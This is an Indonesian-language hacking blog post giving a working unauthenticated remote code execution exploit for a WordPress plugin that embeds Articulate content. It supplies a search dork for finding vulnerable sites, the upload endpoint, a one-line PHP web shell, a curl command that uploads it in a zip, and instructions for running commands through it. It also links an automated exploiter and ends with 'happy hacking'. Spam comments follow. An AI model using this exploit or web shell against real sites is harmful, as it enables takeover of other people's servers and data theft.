WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)








> REFERENCE : https://cxsecurity.com/issue/WLB-2019060137 (AUTH RCE)
> CX: https://cxsecurity.com/issue/WLB-2019060146
> DORK : inurl:/wp-content/plugins/insert-or-embed-articulate/ ( KOK DIKIT? kembangin lah)
> PAYLOAD: /index.php/wp-json/articulate/v1/upload-data
> Bayangkan w udah dpt target
LETS TRY HAHA
oke kita check dolo site.com/ndex.php/wp-json/articulate/v1/upload-data
CONTOH VULN : ada bacaan gitu ;v
Tinggal buat request ... karna di burp suite ribet build requestnya w make curl ja
LETS EXPLOIT
> BUAT FILE index.html dan index.php
index.html :
<html>
Hello world
</html>

index.php :
<?php
system($_GET[cmd]);
?>
> Setelah di buat masukin ke zip :D ( COMPRESS )
> LETS UPLOAD
CURL :
curl site.com/index.php/wp-json/articulate/v1/upload-data -F "name={NAMAFILE}" -F "chunk={RANDOM}" -F "chunks={RANDOM}" -F "file=@FILELOE.zip"
OKE DI SINI ADA BACAAN UPLOAD COMPLETE yg artinya success
kita coba akses ke
site.com/PATH/ < PATH = PATH DI RESULT EX: site.com/wp-content/uploads/articulate_uploads/kntl17/index.php
UNTUK EXCUTE COMMAND TAMBAHIN ?cmd=ls
BEHAHA 8) RCE SUCCESS

For Tools Auto Exploiter

https://pastebin.com/BEy5iDLA

- HAPPY HACKING GUYS -

- RINTOD

2 Responses to "WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)"

  1. This is very educational content and written well for a change. It's nice to see that some people still understand how to write a quality post.! clean wordpress site

    ReplyDelete
  2. Yes i am totally agreed with this article and i just want say that this article is very nice and very informative article.I will make sure to be reading your blog more. You made a good point but I can't help but wonder, what about the other side? !!!!!!Thanks wordpress virus remova

    ReplyDelete

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel